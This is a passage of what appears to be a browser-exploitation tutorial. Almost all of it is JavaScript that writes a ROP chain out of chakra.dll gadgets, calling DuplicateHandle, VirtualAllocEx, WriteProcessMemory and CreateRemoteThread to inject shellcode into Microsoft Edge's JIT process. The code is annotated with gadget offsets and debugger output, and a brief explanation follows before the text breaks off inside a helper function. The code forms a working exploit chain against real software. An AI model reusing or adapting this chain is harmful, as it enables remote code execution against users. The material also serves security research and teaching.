// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtualAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return value (the address of the allocation) in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x18028b4fe: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the thread HANDLE for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address, which holds the value we want to write: the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address, which holds the value we want to write: the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Before the call:

After the call:

Again, this is identical to the previous WriteProcessMemory call, except that we use the ropoffsetTwo variable here. Like ropoffsetOne, it is simply the offset from where our VirtualProtect ROP chain begins to the entry within that ROP chain we want to update. ropoffsetOne pointed at the lpAddress entry, and ropoffsetTwo points at the “fake” return address we want our ROP chain to jump to.
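As a rough illustration of what an offset like ropoffsetTwo represents, the sketch below computes the address of a single 8-byte entry inside a ROP chain stored at a known base. The helper name chainSlotAddress, the slotIndex parameter, and the example base address are hypothetical and are not taken from the exploit, which computes its real offsets elsewhere.

```javascript
// Hypothetical helper: address of the Nth 8-byte entry in a ROP chain.
// Addresses are split into 32-bit low/high halves, mirroring how the
// exploit passes addresses to its read64/write64 primitives.
function chainSlotAddress(baseLo, baseHi, slotIndex) {
    const offset = slotIndex * 0x8;                  // each ROP entry is one QWORD
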